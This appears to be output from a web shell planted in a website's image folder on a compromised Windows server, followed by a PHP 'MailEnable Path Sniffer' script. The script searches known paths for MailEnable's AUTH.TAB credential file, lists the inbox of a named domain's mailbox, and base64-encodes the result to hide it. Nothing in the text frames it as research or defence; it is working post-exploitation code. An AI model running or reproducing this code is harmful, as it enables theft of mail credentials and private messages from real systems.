System: Windows NT WINDOWS18 10.0 build 17763 (Windows Server 2016) AMD64 | User: IWPD_3544(appclien)
Path: D:\Inetpub\vhosts\appclients.in\fruits-vegitables.nmvm.org\image\product
[Back to List]
<?php
$candidates = [
'C:\Program Files (x86)\Mail Enable\Config\AUTH.TAB',
'C:\Program Files\Mail Enable\Config\AUTH.TAB',
'D:\Program Files (x86)\Mail Enable\Config\AUTH.TAB',
'D:\Program Files\Mail Enable\Config\AUTH.TAB',
'C:\Mail Enable\Config\AUTH.TAB',
'D:\Mail Enable\Config\AUTH.TAB'
];
$output = "--- MailEnable Path Sniffer ---\n";
foreach ($candidates as $c) {
if (file_exists($c)) {
$output .= "[!!!] FOUND CONFIG: $c\n";
// Attempt to find the Post Offices folder relative to Config
$base = dirname($c, 2);
$po = $base . '\Post Offices\nmvm.org\MAILROOT\info\Inbox';
if (file_exists($po)) {
$output .= " [!!!] FOUND MAILBOX: $po\n";
$output .= " Contents:\n" . implode("\n", array_slice(scandir($po), 0, 50)) . "\n";
}
}
}
echo base64_encode($output);
?>